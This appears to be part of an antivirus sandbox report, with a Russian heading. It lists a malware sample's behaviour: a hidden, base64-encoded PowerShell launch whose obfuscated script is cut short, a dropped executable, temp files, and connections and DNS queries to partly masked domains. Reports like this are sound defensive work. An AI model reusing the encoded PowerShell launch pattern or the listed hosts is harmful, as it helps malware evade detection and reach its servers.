Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABMAGcAMwBiAHYAOQBlAD0AWwBjAGgAYQByAF0ANAAyADsAJABMAHgAaQB2AG8AZgA4AD0AKAAnAEYAbwAnACsAKAAnAGUAOAA4ACcAKwAnADcAaQAnACkAKQA7ACYAKAAnAG4AZQB3AC0AaQB0AGUAJwArACcAbQAnACkAIA...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1520
- %TEMP%\1070900.cvr
- %HOMEPATH%\zd553cl\jlf7iar\t1_1hl2u.exe
- 'sa###heboom.com':80
- 'ri#####qualrights.com':80
- 'ri#####qualrights.com':443
- 'po###rnv.com':443
- 'ga###aan.com':80
- 'ga###aan.com':443
- 'ri#####qualrights.com':443
- 'po###rnv.com':443
- 'as##kl.com':443
- 'ga###aan.com':443
- 'in###inv.com':443
- DNS ASK sa###heboom.com
- DNS ASK ri#####qualrights.com
- DNS ASK da####wisata.net
- DNS ASK po###rnv.com
- DNS ASK du###serve.com
- DNS ASK as##kl.com
- DNS ASK ga###aan.com
- DNS ASK in###inv.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABMAGcAMwBiAHYAOQBlAD0AWwBjAGgAYQByAF0ANAAyADsAJABMAHgAaQB2AG8AZgA4AD0AKAAnAEYAbwAnACsAKAAnAGUAOAA4ACcAKwAnADcAaQAnACkAKQA7ACYAKAAnAG4AZQB3AC0AaQB0AGUAJwArACcAbQAnACkAIA...' (со скрытым окном)